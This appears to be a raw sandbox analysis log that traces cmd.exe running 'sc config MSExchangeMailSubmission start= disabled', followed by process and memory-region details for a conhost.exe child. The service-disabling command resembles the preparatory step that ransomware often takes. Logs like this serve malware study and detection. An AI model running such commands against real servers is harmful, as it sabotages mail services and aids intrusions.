lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x4, lpData=0x47be7e0*=0x1, lpcbData=0x47be7dc*=0x4) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x0, lpData=0x47be7e0*=0x1, lpcbData=0x47be7dc*=0x1000) returned 0x2 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x4, lpData=0x47be7e0*=0x0, lpcbData=0x47be7dc*=0x4) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x4, lpData=0x47be7e0*=0x9, lpcbData=0x47be7dc*=0x4) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x4, lpData=0x47be7e0*=0x9, lpcbData=0x47be7dc*=0x4) returned 0x0 [0130.945] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x47be7d8, lpData=0x47be7e0, lpcbData=0x47be7dc*=0x1000 | out: lpType=0x47be7d8*=0x0, lpData=0x47be7e0*=0x9, lpcbData=0x47be7dc*=0x1000) returned 0x2 [0130.945] RegCloseKey (hKey=0x94) returned 0x0 [0130.945] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29833 [0130.945] srand (_Seed=0x5ad29833) [0130.945] GetCommandLineW () returned="/c sc config MSExchangeMailSubmission start= disabled" [0130.945] GetCommandLineW () returned="/c sc config MSExchangeMailSubmission start= disabled" [0130.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.945] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a29d08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0130.946] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0130.946] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.946] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.946] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.946] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.946] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.946] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.946] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.946] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.946] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.946] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.946] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.946] GetEnvironmentStringsW () returned 0x4a27db0* [0130.946] FreeEnvironmentStringsA (penv="A") returned 1 [0130.946] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.946] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.946] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.946] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.946] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.946] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.946] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.946] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.946] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.946] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x47bf5ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.947] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x47bf5ac, lpFilePart=0x47bf5a4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47bf5a4*="Desktop") returned 0x1d [0130.947] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0130.947] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x47bf328 | out: lpFindFileData=0x47bf328) returned 0x4a205c8 [0130.947] FindClose (in: hFindFile=0x4a205c8 | out: hFindFile=0x4a205c8) returned 1 [0130.947] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x47bf328 | out: lpFindFileData=0x47bf328) returned 0x4a205c8 [0130.947] FindClose (in: hFindFile=0x4a205c8 | out: hFindFile=0x4a205c8) returned 1 [0130.947] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0130.947] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x47bf328 | out: lpFindFileData=0x47bf328) returned 0x4a205c8 [0130.947] FindClose (in: hFindFile=0x4a205c8 | out: hFindFile=0x4a205c8) returned 1 [0130.947] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0130.947] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0130.947] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0130.947] GetEnvironmentStringsW () returned 0x4a27db0* [0130.947] FreeEnvironmentStringsA (penv="=") returned 1 [0130.947] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.948] GetConsoleOutputCP () returned 0x1b5 [0130.948] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.948] GetUserDefaultLCID () returned 0x409 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x47bf6dc, cchData=128 | out: lpLCData="0") returned 2 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x47bf6dc, cchData=128 | out: lpLCData="0") returned 2 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x47bf6dc, cchData=128 | out: lpLCData="1") returned 2 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0130.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0130.949] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0130.949] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.949] GetConsoleTitleW (in: lpConsoleTitle=0x4a2aa68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.950] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0130.950] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0130.950] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0130.950] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0130.950] _wcsicmp (_String1="sc", _String2=")") returned 74 [0130.950] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0130.950] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0130.950] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0130.950] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0130.950] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0130.950] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0130.951] GetConsoleTitleW (in: lpConsoleTitle=0x47bf3c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.952] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0130.952] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0130.952] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0130.952] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0130.952] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0130.952] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0130.952] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0130.952] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0130.952] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0130.952] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0130.952] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0130.952] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0130.952] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0130.952] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0130.952] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0130.952] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0130.952] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0130.952] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0130.952] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0130.952] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0130.952] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0130.952] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0130.952] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0130.952] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0130.952] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0130.952] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0130.952] _wcsicmp (_String1="sc", _String2="START") returned -17 [0130.952] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0130.952] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0130.952] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0130.952] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0130.952] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0130.952] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0130.952] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0130.952] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0130.952] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0130.952] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0130.952] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0130.952] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0130.952] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0130.952] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0130.952] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0130.953] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0130.953] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0130.953] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0130.953] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0130.953] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0130.953] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0130.953] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0130.953] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0130.953] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0130.953] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0130.953] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0130.953] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0130.953] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0130.953] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0130.953] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0130.953] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0130.953] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0130.953] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0130.953] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0130.953] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0130.953] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0130.953] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0130.953] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0130.953] _wcsicmp (_String1="sc", _String2="START") returned -17 [0130.953] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0130.953] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0130.953] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0130.953] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0130.953] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0130.953] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0130.953] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0130.953] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0130.953] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0130.953] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0130.953] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0130.953] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0130.953] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0130.953] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0130.953] SetErrorMode (uMode=0x0) returned 0x0 [0130.953] SetErrorMode (uMode=0x1) returned 0x0 [0130.954] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4a205d0, lpFilePart=0x47beed4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47beed4*="Desktop") returned 0x1d [0130.954] SetErrorMode (uMode=0x0) returned 0x1 [0130.954] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0130.954] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.962] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.962] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.963] GetConsoleTitleW (in: lpConsoleTitle=0x47bf154, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.963] InitializeProcThreadAttributeList (in: lpAttributeList=0x47bf080, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x47bf064 | out: lpAttributeList=0x47bf080, lpSize=0x47bf064) returned 1 [0130.963] UpdateProcThreadAttribute (in: lpAttributeList=0x47bf080, dwFlags=0x0, Attribute=0x60001, lpValue=0x47bf06c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x47bf080, lpPreviousValue=0x0) returned 1 [0130.963] GetStartupInfoW (in: lpStartupInfo=0x47bf0b8 | out: lpStartupInfo=0x47bf0b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.963] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.964] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.964] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.964] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.964] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.964] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.964] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.964] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.964] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.965] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeMailSubmission start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x47bf008*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeMailSubmission start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x47bf054 | out: lpCommandLine="sc config MSExchangeMailSubmission start= disabled", lpProcessInformation=0x47bf054*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xfa8, dwThreadId=0xfb0)) returned 1 [0130.971] CloseHandle (hObject=0xa4) returned 1 [0130.971] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.971] GetEnvironmentStringsW () returned 0x4a29f18* [0130.971] FreeEnvironmentStringsA (penv="=") returned 1 [0130.971] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0131.018] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x47befec | out: lpExitCode=0x47befec*=0x424) returned 1 [0131.018] CloseHandle (hObject=0xa8) returned 1 [0131.018] _vsnwprintf (in: _Buffer=0x47bf0d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x47beff4 | out: _Buffer="00000424") returned 8 [0131.018] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0131.018] GetEnvironmentStringsW () returned 0x4a2b428* [0131.018] FreeEnvironmentStringsA (penv="=") returned 1 [0131.018] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.018] GetEnvironmentStringsW () returned 0x4a2b428* [0131.018] FreeEnvironmentStringsA (penv="=") returned 1 [0131.018] DeleteProcThreadAttributeList (in: lpAttributeList=0x47bf080 | out: lpAttributeList=0x47bf080) [0131.018] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.018] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0131.019] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.019] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0131.019] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.019] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0131.019] SetConsoleInputExeNameW () returned 0x1 [0131.019] GetConsoleOutputCP () returned 0x1b5 [0131.019] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.019] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.019] exit (_Code=1060) Thread: id = 478 os_tid = 0xfb4 Process: id = "138" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x74f45000" os_pid = "0xf94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "137" os_parent_pid = "0xf6c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7569 start_va = 0x7fc3e000 end_va = 0x7fc3efff entry_point = 0x0 region_type = private name = "private_0x000000007fc3e000" filename = "" Region: id = 7570 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7571 start_va = 0x9defbb0000 end_va = 0x9defbcffff entry_point = 0x0 region_type = private name = "private_0x0000009defbb0000" filename = "" Region: id = 7572 start_va = 0x9defbd0000 end_va = 0x9defbe3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009defbd0000" filename = "" Region: id = 7573 start_va = 0x9defbf0000 end_va = 0x9defc2ffff entry_point = 0x0 region_type = private name = "private_0x0000009defbf0000" filename = "" Region: id = 7574 start_va = 0x7df5ff990000 end_va = 0x7ff5ff98ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff990000" filename = "" Region: id = 7575 start_va = 0x7ff6c3e70000 end_va = 0x7ff6c3e92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e70000" filename = "" Region: id = 7576 start_va = 0x7ff6c3e9d000 end_va = 0x7ff6c3e9dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e9d000" filename = "" Region: id = 7577 start_va = 0x7ff6c3e9e000 end_va = 0x7ff6c3e9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e9e000" filename = "" Region: id = 7578 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7579 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7580 start_va = 0x9defbb0000 end_va = 0x9defbbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009defbb0000" filename = "" Region: id = 7581 start_va = 0x9defbc0000 end_va = 0x9defbc6fff entry_point = 0x0 region_type = private name = "private_0x0000009defbc0000" filename = "" Region: id = 7582 start_va = 0x9defc30000 end_va = 0x9defcedfff entry_point = 0x9defc30000 region_type = mapped_file name = "locale.nls" filename = 